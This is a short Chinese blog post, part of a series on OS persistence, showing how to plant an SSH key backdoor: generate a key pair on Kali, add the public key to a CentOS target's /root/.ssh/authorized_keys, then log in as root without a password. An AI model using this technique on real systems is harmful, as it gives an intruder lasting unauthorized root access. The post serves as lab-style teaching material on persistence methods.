操作系统权限维持(八)之Linux系统-SSHKey后门

系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门
操作系统权限维持(六)之Linux系统-定时任务后门
操作系统权限维持(七)之Linux系统-SUID后门

SSHKey后门

当我们具有写入权限的时候,我们同样可以自行生成密钥,当kali机器第一次生成密钥的时候,并且把公钥放在了你的服务器上面,当你把公钥放在服务器上面的时候,这就意味着他可以正常的解密和加密你发过来的内容,后面你就是通过加解密去认证会话的,并不需要输入密码

生成密钥和查看公钥(kali执行):

ssh-keygen -t rsa 
cd /root/.ssh 
ls
cat id_rsa.pub

在这里插入图片描述

将 id_rsa.pub文件中的内容拷贝到目标机器上并且写入到 authorized_keys这个文件夹下

在这里插入图片描述

写入(CentOS执行):

 cd /root/.ssh 
vim authorized_keys

在这里插入图片描述

现在我们不需要密码就能连接目标机器了

连接(Kali执行):

ssh root@192.168.52.132

在这里插入图片描述

在这里插入图片描述

posted @ 2023-03-27 10:12  私ははいしゃ敗者です  阅读(30)  评论(0编辑  收藏  举报  来源